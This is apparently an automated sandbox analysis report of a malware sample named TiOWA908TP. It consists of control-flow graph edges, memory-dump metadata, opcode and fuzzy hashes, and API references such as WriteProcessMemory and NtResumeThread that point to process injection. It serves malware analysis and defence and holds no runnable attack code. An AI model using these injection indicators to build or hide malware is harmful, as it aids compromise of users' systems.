58687 5567c18 WriteProcessMemory 58686->58687 58689 5567cb7 58687->58689 58689->58652 58691 5567c60 WriteProcessMemory 58690->58691 58693 5567cb7 58691->58693 58693->58652 58695 5568235 NtResumeThread 58694->58695 58697 55682b5 58695->58697 58697->58657 58699 5568280 NtResumeThread 58698->58699 58701 55682b5 58699->58701 58701->58657
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836579197.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6660000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                      • API String ID: 0-1951557290
                                      • Opcode ID: 0c598723af580eb6bab47da9ded7b7a45e4b65b0c21b3580ddfb78660e3d064f
                                      • Instruction ID: 95890e7c661b0d4cf1702012cd77f12892c1a3b431cb0141ec65004962a4db73
                                      • Opcode Fuzzy Hash: 0c598723af580eb6bab47da9ded7b7a45e4b65b0c21b3580ddfb78660e3d064f
                                      • Instruction Fuzzy Hash: F3B21934A00228DFEB64CFA5D894BADB7B6BF88300F158199E505AB3A5CB71EC45CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836579197.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6660000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$$q$$q$$q$$q
                                      • API String ID: 0-807231587
                                      • Opcode ID: 12f62a6ee93405430ee6ac4be1ef6296efa3f554e61c5c02b9b6dba2d60934a2
                                      • Instruction ID: bbf435a8ef0fb7181e2a80bdd307ab7338535546d7cf809b9c60c8fd864df8df
                                      • Opcode Fuzzy Hash: 12f62a6ee93405430ee6ac4be1ef6296efa3f554e61c5c02b9b6dba2d60934a2
                                      • Instruction Fuzzy Hash: 47221B38A00218CFDB64DFA5D994BADB7B2BF48300F148199E509AB3A5DB71ED81CF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 630 6285528-6285549 631 628554b 630->631 632 6285550-6285637 630->632 631->632 634 6285d39-6285d61 632->634 635 628563d-628577e 632->635 638 6286467-6286470 634->638 679 6285d02-6285d2c 635->679 680 6285784-62857df 635->680 640 6285d6f-6285d79 638->640 641 6286476-628648d 638->641 642 6285d7b 640->642 643 6285d80-6285e74 640->643 642->643 662 6285e9e 643->662 663 6285e76-6285e82 643->663 664 6285ea4-6285ec4 662->664 665 6285e8c-6285e92 663->665 666 6285e84-6285e8a 663->666 670 6285f24-6285fa4 664->670 671 6285ec6-6285f1f 664->671 668 6285e9c 665->668 666->668 668->664 691 6285ffb-628603e 670->691 692 6285fa6-6285ff9 670->692 683 6286464 671->683 693 6285d2e 679->693 694 6285d36 679->694 686 62857e1 680->686 687 62857e4-62857ef 680->687 683->638 686->687 690 6285c17-6285c1d 687->690 695 6285c23-6285c9f call 62800d0 690->695 696 62857f4-6285812 690->696 715 6286049-6286052 691->715 692->715 693->694 694->634 735 6285cec-6285cf2 695->735 697 6285869-628587e 696->697 698 6285814-6285818 696->698 703 6285880 697->703 704 6285885-628589b 697->704 698->697 701 628581a-6285825 698->701 707 628585b-6285861 701->707 703->704 705 628589d 704->705 706 62858a2-62858b9 704->706 705->706 710 62858bb 706->710 711 62858c0-62858d6 706->711 712 6285863-6285864 707->712 713 6285827-628582b 707->713 710->711 718 62858d8 711->718 719 62858dd-62858e4 711->719 721 62858e7-6285952 712->721 716 628582d 713->716 717 6285831-6285849 713->717 722 62860b2-62860c1 715->722 716->717 723 628584b 717->723 724 6285850-6285858 717->724 718->719 719->721 725 6285954-6285960 721->725 726 6285966-6285b1b 721->726 728 62860c3-628614b 722->728 729 6286054-628607c 722->729 723->724 724->707 725->726 737 6285b1d-6285b21 726->737 738 6285b7f-6285b94 726->738 767 62862c4-62862d0 728->767 732 628607e 729->732 733 6286083-62860ac 729->733 732->733 733->722 741 6285ca1-6285ce9 call 62804e8 * 2 735->741 742 6285cf4-6285cfa 735->742 737->738 739 6285b23-6285b32 737->739 743 6285b9b-6285bbc 738->743 744 6285b96 738->744 745 6285b71-6285b77 739->745 741->735 742->679 747 6285bbe 743->747 748 6285bc3-6285be2 743->748 744->743 753 6285b79-6285b7a 745->753 754 6285b34-6285b38 745->754 747->748 750 6285be9-6285c09 748->750 751 6285be4 748->751 759 6285c0b 750->759 760 6285c10 750->760 751->750 762 6285c14 753->762 757 6285b3a-6285b3e 754->757 758 6285b42-6285b63 754->758 757->758 763 6285b6a-6285b6e 758->763 764 6285b65 758->764 759->760 760->762 762->690 763->745 764->763 769 6286150-6286159 767->769 770 62862d6-6286331 767->770 771 628615b 769->771 772 6286162-62862b8 769->772 785 6286368-6286392 770->785 786 6286333-6286366 770->786 771->772 774 6286168-62861a8 771->774 775 62861ad-62861ed 771->775 776 62861f2-6286232 771->776 777 6286237-6286277 771->777 790 62862be 772->790 774->790 775->790 776->790 777->790 794 628639b-628642e 785->794 786->794 790->767 798 6286435-6286455 794->798 798->683
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,YF$Teq$Upt
                                      • API String ID: 0-1921354724
                                      • Opcode ID: e1ec0171eb5b3df3d95778755d0a18090fbc951b8507c1cc19b2b0cbe1176e38
                                      • Instruction ID: 8c9b8e176a69e4b766b0aa14308386df7603a58e41f0ea27e63f861a322d6abf
                                      • Opcode Fuzzy Hash: e1ec0171eb5b3df3d95778755d0a18090fbc951b8507c1cc19b2b0cbe1176e38
                                      • Instruction Fuzzy Hash: CCA2C675A11228CFDB64DF69CC84A99BBB2FF89300F1581E9D509AB365DB319E81CF40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 921 62878f0-628792e 922 6287930 921->922 923 6287935-6287a57 921->923 922->923 927 6287a59-6287a6f 923->927 928 6287a7b-6287a87 923->928 1205 6287a75 call 628a480 927->1205 1206 6287a75 call 628a490 927->1206 929 6287a89 928->929 930 6287a8e-6287a93 928->930 929->930 931 6287acb-6287b14 930->931 932 6287a95-6287aa1 930->932 942 6287b1b-6287de0 931->942 943 6287b16 931->943 934 6287aa8-6287ac6 932->934 935 6287aa3 932->935 936 628922f-6289235 934->936 935->934 938 6289260 936->938 939 6289237-6289257 936->939 939->938 968 6288810-628881c 942->968 943->942 969 6288822-628885a 968->969 970 6287de5-6287df1 968->970 979 6288934-628893a 969->979 971 6287df8-6287f1d 970->971 972 6287df3 970->972 1007 6287f5d-6287fe6 971->1007 1008 6287f1f-6287f57 971->1008 972->971 980 628885f-62888dc 979->980 981 6288940-6288978 979->981 996 62888de-62888e2 980->996 997 628890f-6288931 980->997 992 6288cd6-6288cdc 981->992 994 628897d-6288a59 992->994 995 6288ce2-6288d2a 992->995 1038 6288a65-6288b7f 994->1038 1004 6288d2c-6288d9f 995->1004 1005 6288da5-6288df0 995->1005 996->997 1000 62888e4-628890c 996->1000 997->979 1000->997 1004->1005 1027 62891f9-62891ff 1005->1027 1035 6287fe8-6287ff0 1007->1035 1036 6287ff5-6288079 1007->1036 1008->1007 1029 6288df5-6288e77 1027->1029 1030 6289205-628922d 1027->1030 1048 6288e79-6288e94 1029->1048 1049 6288e9f-6288eab 1029->1049 1030->936 1037 6288801-628880d 1035->1037 1061 6288088-628810c 1036->1061 1062 628807b-6288083 1036->1062 1037->968 1088 6288c1e-6288c22 1038->1088 1089 6288b85-6288c19 1038->1089 1048->1049 1050 6288ead 1049->1050 1051 6288eb2-6288ebe 1049->1051 1050->1051 1053 6288ec0-6288ecc 1051->1053 1054 6288ed1-6288ee0 1051->1054 1058 62891e0-62891f6 1053->1058 1059 6288ee9-62891c1 1054->1059 1060 6288ee2 1054->1060 1058->1027 1094 62891cc-62891d8 1059->1094 1060->1059 1063 6289048-62890b1 1060->1063 1064 6288fda-6289043 1060->1064 1065 6288f5d-6288fd5 1060->1065 1066 6288eef-6288f58 1060->1066 1067 62890b6-628911e 1060->1067 1113 628811b-628819f 1061->1113 1114 628810e-6288116 1061->1114 1062->1037 1063->1094 1064->1094 1065->1094 1066->1094 1099 6289192-6289198 1067->1099 1096 6288c7f-6288cbc 1088->1096 1097 6288c24-6288c7d 1088->1097 1111 6288cbd-6288cd3 1089->1111 1094->1058 1096->1111 1097->1111 1102 628919a-62891a4 1099->1102 1103 6289120-628917e 1099->1103 1102->1094 1119 6289180 1103->1119 1120 6289185-628918f 1103->1120 1111->992 1126 62881ae-6288232 1113->1126 1127 62881a1-62881a9 1113->1127 1114->1037 1119->1120 1120->1099 1133 6288241-62882c5 1126->1133 1134 6288234-628823c 1126->1134 1127->1037 1140 62882d4-6288358 1133->1140 1141 62882c7-62882cf 1133->1141 1134->1037 1147 628835a-6288362 1140->1147 1148 6288367-62883eb 1140->1148 1141->1037 1147->1037 1154 62883fa-628847e 1148->1154 1155 62883ed-62883f5 1148->1155 1161 628848d-6288511 1154->1161 1162 6288480-6288488 1154->1162 1155->1037 1168 6288520-62885a4 1161->1168 1169 6288513-628851b 1161->1169 1162->1037 1175 62885b3-6288637 1168->1175 1176 62885a6-62885ae 1168->1176 1169->1037 1182 6288639-6288641 1175->1182 1183 6288646-62886ca 1175->1183 1176->1037 1182->1037 1189 62886d9-628875d 1183->1189 1190 62886cc-62886d4 1183->1190 1196 628876c-62887f0 1189->1196 1197 628875f-6288767 1189->1197 1190->1037 1203 62887fc-62887fe 1196->1203 1204 62887f2-62887fa 1196->1204 1197->1037 1203->1037 1204->1037 1205->928 1206->928
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2$$q
                                      • API String ID: 0-2017333547
                                      • Opcode ID: 43cb984d665dadd1a8fa66a8bd4f7799b27a31929c7282132c851ea0271278ac
                                      • Instruction ID: 3f607f824bb75abd1d0c35e3cad4c2ba64420ed6879b15faac8f8cfe003eb3d4
                                      • Opcode Fuzzy Hash: 43cb984d665dadd1a8fa66a8bd4f7799b27a31929c7282132c851ea0271278ac
                                      • Instruction Fuzzy Hash: 0EE2E674E012288FDB65DF68DC94B9AB7F2BB88301F1081EAD409A7394DB749E85CF45

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1921 5560f30-5560f51 1922 5560f53 1921->1922 1923 5560f58-556103b call 5561a80 1921->1923 1922->1923 1931 556103d-5561048 1923->1931 1932 556104a 1923->1932 1933 5561054-556116f 1931->1933 1932->1933 1944 5561181-55611ac 1933->1944 1945 5561171-5561177 1933->1945 1946 5561960-556197c 1944->1946 1945->1944 1947 5561982-556199d 1946->1947 1948 55611b1-5561314 1946->1948 1958 5561326-556145c 1948->1958 1959 5561316-556131c 1948->1959 2012 5561462 call 63e2060 1958->2012 2013 5561462 call 63e2050 1958->2013 1959->1958 1968 5561467-55614a3 1969 55614a5-55614a9 1968->1969 1970 5561508-5561512 1968->1970 1972 55614b1-5561503 1969->1972 1973 55614ab-55614ac 1969->1973 1971 5561739-5561758 1970->1971 1975 5561517-556165d 1971->1975 1976 556175e-5561788 1971->1976 1974 55617de-5561849 1972->1974 1973->1974 1992 556185b-55618a6 1974->1992 1993 556184b-5561851 1974->1993 2004 5561732-5561733 1975->2004 2005 5561663-556172f 1975->2005 1982 556178a-55617d8 1976->1982 1983 55617db-55617dc 1976->1983 1982->1983 1983->1974 1994 5561945-556195d 1992->1994 1995 55618ac-5561944 1992->1995 1993->1992 1994->1946 1995->1994 2004->1971 2005->2004 2012->1968 2013->1968
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: b2007193b9e0ce0e490116c56a8a6b02cc91089b988bdeb927a7987f48f464a0
                                      • Instruction ID: 97bba2afdae27ca425e404309601159143326147708eed57526dfe9768dd4e33
                                      • Opcode Fuzzy Hash: b2007193b9e0ce0e490116c56a8a6b02cc91089b988bdeb927a7987f48f464a0
                                      • Instruction Fuzzy Hash: BF52D775D016298FDB64DF65C894AD9B7B2FF89300F1082AAD50DA7354DB70AE81CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2240 6669990-66699bb 2241 66699c2-6669a0f 2240->2241 2242 66699bd 2240->2242 2245 6669a12-6669a18 2241->2245 2242->2241 2246 6669a21-6669a22 2245->2246 2247 6669a1a 2245->2247 2248 6669a24-6669a30 2246->2248 2247->2248 2249 6669a84-6669ab4 2247->2249 2250 6669bd4-6669c3e call 6664038 2247->2250 2251 6669de3-6669e08 2247->2251 2252 6669a31-6669a41 2247->2252 2253 6669c51-6669cbb call 6664038 2247->2253 2254 6669cce-6669d13 2247->2254 2255 6669ac8-6669af7 2247->2255 2256 6669af9-6669bc3 2247->2256 2296 6669ab6-6669abc 2249->2296 2250->2296 2325 6669c44-6669c4c 2250->2325 2257 6669dd1-6669dd7 2251->2257 2258 6669e0a-6669e12 2251->2258 2283 6669a4d-6669a78 2252->2283 2253->2296 2327 6669cc1-6669cc9 2253->2327 2300 6669d15-6669d1b 2254->2300 2301 6669d1d-6669d22 2254->2301 2255->2296 2256->2296 2342 6669bc9-6669bcf 2256->2342 2263 6669de0-6669de1 2257->2263 2264 6669dd9 2257->2264 2258->2257 2263->2251 2264->2251 2269 6669f04 2264->2269 2270 666a024-666a052 2264->2270 2271 6669f01-6669f02 2264->2271 2272 6669fae-6669faf 2264->2272 2273 666a0ce-666a0fe 2264->2273 2274 6669f6c-6669f9f 2264->2274 2275 6669ecd-6669ef5 2264->2275 2276 666a10d-666a10e 2264->2276 2277 6669e14-6669e6a 2264->2277 2278 6669fb1 2264->2278 2279 666a05f-666a060 2264->2279 2280 6669e7b-6669e98 2264->2280 2292 6669f05 2269->2292 2319 666a00f-666a018 2270->2319 2322 666a054-666a05d 2270->2322 2271->2292 2290 6669fb2 2272->2290 2305 666a100-666a10b 2273->2305 2306 666a0b9-666a0c2 2273->2306 2304 6669f57-6669f60 2274->2304 2314 6669fa1-6669fac 2274->2314 2316 6669ebb-6669ec1 2275->2316 2321 6669ef7-6669eff 2275->2321 2308 666a10f 2276->2308 2277->2257 2332 6669e70-6669e76 2277->2332 2278->2290 2279->2306 2280->2275 2299 6669e9a-6669eb1 2280->2299 2283->2245 2295 6669a7a-6669a82 2283->2295 2290->2319 2292->2304 2295->2245 2309 6669ac5-6669ac6 2296->2309 2310 6669abe 2296->2310 2315 6669eb3-6669eb9 2299->2315 2299->2316 2300->2301 2317 6669d27-6669d72 2301->2317 2318 6669d24-6669d25 2301->2318 2312 6669f62 2304->2312 2313 6669f69-6669f6a 2304->2313 2305->2306 2323 666a0c4 2306->2323 2324 666a0cb-666a0cc 2306->2324 2308->2308 2309->2255 2310->2250 2310->2251 2310->2253 2310->2254 2310->2255 2310->2256 2310->2277 2310->2280 2312->2270 2312->2272 2312->2273 2312->2274 2312->2276 2312->2278 2312->2279 2313->2272 2313->2274 2314->2304 2315->2316 2328 6669ec3 2316->2328 2329 6669eca-6669ecb 2316->2329 2337 6669d74-6669d7a 2317->2337 2338 6669d7c-6669d81 2317->2338 2318->2317 2330 666a021-666a022 2319->2330 2331 666a01a 2319->2331 2321->2316 2322->2319 2323->2273 2323->2276 2324->2273 2325->2296 2327->2296 2328->2269 2328->2270 2328->2271 2328->2272 2328->2273 2328->2274 2328->2275 2328->2276 2328->2278 2328->2279 2329->2271 2329->2275 2330->2270 2330->2279 2331->2270 2331->2273 2331->2276 2331->2279 2332->2257 2337->2338 2340 6669d86-6669da9 call 666a4b8 2338->2340 2341 6669d83-6669d84 2338->2341 2344 6669daf-6669dc5 2340->2344 2341->2340 2342->2296 2344->2257 2345 6669dc7-6669dcf 2344->2345 2345->2257
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836579197.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6660000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: e21d991e39d93b2786ab592f3af059148a5ac385629df4b4c1ccec5a81cfa7ce
                                      • Instruction ID: 9769a2a509f60d74efb7b1af10a2de6e765f3a7c521fdd991213d70cafbabcc6
                                      • Opcode Fuzzy Hash: e21d991e39d93b2786ab592f3af059148a5ac385629df4b4c1ccec5a81cfa7ce
                                      • Instruction Fuzzy Hash: 83020770E05219CFEBA4DF6AE844B99B7F2FB89300F1081AAE809A7355D7745D85CF41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836579197.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6660000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: 37856d19a2d045042d29ac4df27e9cced61406948e50d24a35f62cfee67e3aec
                                      • Instruction ID: 55695213bb9482c7fd488ec4120acc925954cd257a25045622683b6e8d367efe
                                      • Opcode Fuzzy Hash: 37856d19a2d045042d29ac4df27e9cced61406948e50d24a35f62cfee67e3aec
                                      • Instruction Fuzzy Hash: EB02F770E05219CFEBA4DF6AE884B99B7F2FB89300F1081AAD909A7354DB745D85CF41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq
                                      • API String ID: 0-3820536768
                                      • Opcode ID: eff119ebfb2dab74eb56b27b45af1aa646e8b9b138c93ab0aac2dfdf178a1405
                                      • Instruction ID: a3c902a427d98b49b9e3b059b351686e42759e0347b768726f964500b29e8c1f
                                      • Opcode Fuzzy Hash: eff119ebfb2dab74eb56b27b45af1aa646e8b9b138c93ab0aac2dfdf178a1405
                                      • Instruction Fuzzy Hash: 82E14A70D04218CFEBA4CFA9D898B9EBBF2FB89304F1180AAD409A7255DB745D85CF41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq
                                      • API String ID: 0-3820536768
                                      • Opcode ID: 86bf6b574028f369c1f0b9c62879fb47f880bfb2c659ac7458213dac28509936
                                      • Instruction ID: 0550d75a30acdd21d734a5c8bb8f9c060feb1be7457b6d766cba7dd696123544
                                      • Opcode Fuzzy Hash: 86bf6b574028f369c1f0b9c62879fb47f880bfb2c659ac7458213dac28509936
                                      • Instruction Fuzzy Hash: 56D13A70E04218CFEBA4CFA9D8587AEB7F2FB89304F1190AAC909A7355D7745985CF41
                                      APIs
                                      • NtResumeThread.NTDLL(?,?), ref: 055682A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: b95ed553bfb680d65b09a06214ed37f3ba5281624bc712baefc378da08410ef4
                                      • Instruction ID: 18de0572b7da5f3549371e35ac7ce92994d206d6ea676c16e56d6a5e60cd7095
                                      • Opcode Fuzzy Hash: b95ed553bfb680d65b09a06214ed37f3ba5281624bc712baefc378da08410ef4
                                      • Instruction Fuzzy Hash: 581144B5D003498FDB10DFAAC8847EEFBF4BF88214F54842AC419B7240CB78A9458FA4
                                      APIs
                                      • NtResumeThread.NTDLL(?,?), ref: 055682A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 429143d368b6fea288776eb21050c81c0d8f1d169badcc6b655dd1fc6453e9fc
                                      • Instruction ID: 0b137659a95990178c2dd5d81df017c5605f93bf6409e1a5e7b1e35d301cd7e2
                                      • Opcode Fuzzy Hash: 429143d368b6fea288776eb21050c81c0d8f1d169badcc6b655dd1fc6453e9fc
                                      • Instruction Fuzzy Hash: E31103B1D003498FDB10DFAAC8847AEFBF4AF88214F54842AD419A7240CB78A9458FA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: h
                                      • API String ID: 0-2439710439
                                      • Opcode ID: 9fcdf2afe5b0cbfc9ca9fffb77ed11087f46db2f3de7de1956211bf5a60b82f5
                                      • Instruction ID: 5ca241e2f832c6af037fb7893230ffa19177a29eb5d91892f1a8d04e802fb0f3
                                      • Opcode Fuzzy Hash: 9fcdf2afe5b0cbfc9ca9fffb77ed11087f46db2f3de7de1956211bf5a60b82f5
                                      • Instruction Fuzzy Hash: E4711631D006699FEB64DF69CC54ADABBB2FF89300F1081AAD44DA7254DB306E85CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836796377.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6760000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fQ
                                      • API String ID: 0-3620927468
                                      • Opcode ID: c27446d422b7ce67847917009046fe197923100a230b63686cf1cc0df709f85d
                                      • Instruction ID: 8e0eeeea629ada05740cd452494c1286e0dff4b1656b4513bf72ed074393b0d9
                                      • Opcode Fuzzy Hash: c27446d422b7ce67847917009046fe197923100a230b63686cf1cc0df709f85d
                                      • Instruction Fuzzy Hash: AB511774A0421ADFDB44DFA9D9846AEBBF2FB88300F14912AD409E7344D738A942CF91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 577534ae174a78b9f02d44852b2ef7db8e3b82a4d020a356701d388f356b92b5
                                      • Instruction ID: b3512abcab135f74264208416c32269cafdbbd213a39e97538ccee8307520a13
                                      • Opcode Fuzzy Hash: 577534ae174a78b9f02d44852b2ef7db8e3b82a4d020a356701d388f356b92b5
                                      • Instruction Fuzzy Hash: 8752B674A112298FDB64DF28CD98B9AB7B2FB48301F1081D9D90DA7395DB30AE81CF55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a92788495c0b428312c00f4cd8793d3fb53f7e32c68d499c1721a06fb9361c01
                                      • Instruction ID: 40a848d92c2b1860fe64f428fef9bc2d874d5d0c6307e913ce01684c9a9c0e6f
                                      • Opcode Fuzzy Hash: a92788495c0b428312c00f4cd8793d3fb53f7e32c68d499c1721a06fb9361c01
                                      • Instruction Fuzzy Hash: BE12F3B0E05298CFEB64CF68C888BEDBBF2BB49300F1095AAD409A7245D77859C5CF51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 168f706660f819deed2eea9e9480efe0819b4c32d655ad441ba73ac821eb8832
                                      • Instruction ID: 61a491f3883ef67276f60506c2b48356bb5aca2fdceb9c42c3fee06a3810bb42
                                      • Opcode Fuzzy Hash: 168f706660f819deed2eea9e9480efe0819b4c32d655ad441ba73ac821eb8832
                                      • Instruction Fuzzy Hash: C402F574E05298CFEB64CF68C884BEDBBF2BB49300F1095AAD409A7245D7785AC5CF51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d3ec6aa40af918ff6fd0e527799110ecc662940233fc89dc368fb4bb0f4eae6
                                      • Instruction ID: be4d82a98eb9bd2365cd99377ff1855753c660db038cdab3d451216d2decf5b0
                                      • Opcode Fuzzy Hash: 0d3ec6aa40af918ff6fd0e527799110ecc662940233fc89dc368fb4bb0f4eae6
                                      • Instruction Fuzzy Hash: 6902E274E05298CFEB60DF68C888BADBBF2FB49300F1095AAD409A7245D7785AC5CF51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f15290f1bb6302c8417383075c91332ad47c72a31f8ca52d4926ffa8403f62ec
                                      • Instruction ID: 2642df7a4fc14345b736d28a9031b754f3812ee08882a64cd221d8a0aa833097
                                      • Opcode Fuzzy Hash: f15290f1bb6302c8417383075c91332ad47c72a31f8ca52d4926ffa8403f62ec
                                      • Instruction Fuzzy Hash: 61C1E3B0D05219CFEB90CF99C488BEEBBF5BB46314F10906AD455A7681C7785989CFE0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cee64f2f7bf5373b3a858aacc39d1c1209fd49898134c0154dc41853797f0fc8
                                      • Instruction ID: 11f3808c64c2ce3d72acbf473fd36c8126c33dc0690ec1cf76438de86a109572
                                      • Opcode Fuzzy Hash: cee64f2f7bf5373b3a858aacc39d1c1209fd49898134c0154dc41853797f0fc8
                                      • Instruction Fuzzy Hash: 3ED1B274E11218CFDB64DFA9C994B9DBBB2BF89300F1081A9D409AB3A5DB349D81CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a2eafb26cfe575ca93ddb5cb9f286e71b01ab5943ad1d8e3f39b7a9d723a5de0
                                      • Instruction ID: 85f35307d12b364d1661dae91bedb686c893836ca37d8263fd16362889495d2c
                                      • Opcode Fuzzy Hash: a2eafb26cfe575ca93ddb5cb9f286e71b01ab5943ad1d8e3f39b7a9d723a5de0
                                      • Instruction Fuzzy Hash: 04C11670E05218CFEB94DF69D994BAEBBF2FB99300F1090AAD419A7385DB745981CF40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae98a791e95a18c822a13c01fe1ecbfec28bf4629b192592dc58581d0061ed77
                                      • Instruction ID: cac8ec07ff50ea485a3e55b9e821277bc547f5a6a0fbfb974f40e7416b8d420e
